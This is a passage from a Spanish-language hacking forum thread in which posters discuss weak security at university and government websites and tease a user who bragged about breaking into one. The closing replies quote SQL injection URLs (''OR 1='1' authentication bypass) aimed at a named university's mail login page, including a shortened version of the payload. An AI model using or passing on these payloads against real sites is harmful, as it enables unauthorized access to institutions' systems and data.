He decidido dejar de publicar!!
xD
.
WTF ?!
hacia tiempo que no veia una inyeccion tan curiosa :D
Lo del tema de las Universidades creo yo que es por la ramificacion de Dominios y las subestructuras que la mayoria implica. Es decir, la Administracion de una Red perteneciente a Universidades y similares instituciones se hace algo tediosa a la hora de coordinarla y de actualizarla entre otras cosas.
Se por experiencia personal que la seguridad suele ser bien floja pero me remito a lo anteriormente dicho.
La mayoria de los conocidos hacks a la NASA suelen ser de este estilo. Un subdominio perdido entre la rama de dominios queda descuidado y es Owneado facilmente. La gente tiende a pensar que el que lo hizo era un genio cuando en realidad es un niñato que no sabe inyectar.
Bueno solo eso !
Saludos.
Cita de: ekos_e en 4 Octubre 2010, 00:04 AMAún no puedo responder la pregunta ¿Porque se dedican tan pocos esfuerzos académicos y económicos a la seguridad de la Información de Universidades e Instituciones principalmente de gobierno?
La "web" la habrá hecho un alumno de primero como mucho (sólo hace falta ver el diseño).
Además, ni que hubieras robado información clasificada de la guerra de irak, como mucho puedes desfacear la web e ir a contar en foros lo malote que eres.
Cita de: ekos_e en 4 Octubre 2010, 00:04 AM
... pero pro ahora los he dejado descansar!!.
jajajjajajaajajajajajajajja
Cita de: ekos_e en 4 Octubre 2010, 00:04 AM
http://fca.uce.edu.ec/SELEC_Mail.ASP?CED='OR%201='1&NOV=DFDSFSKJLJKJFGDFSFGSDGSDHDFHDFHFGRETWETWERTERGDFGDFGSDGSDGSDFGGHDDDSDFSFSDFFSDFFSDFDFF&CLA='OR%201='1&JHKHKJHKH (http://fca.uce.edu.ec/SELEC_Mail.ASP?CED='OR%201='1&NOV=DFDSFSKJLJKJFGDFSFGSDGSDHDFHDFHFGRETWETWERTERGDFGDFGSDGSDGSDFGGHDDDSDFSFSDFFSDFFSDFDFF&CLA='OR%201='1&JHKHKJHKH)
WTF!, para que tanta cosa, si con solo poner lo siguiente basta,
http://fca.uce.edu.ec/SELEC_Mail.ASP?CED=%27OR%201=%271&CLA=%27OR%201=%271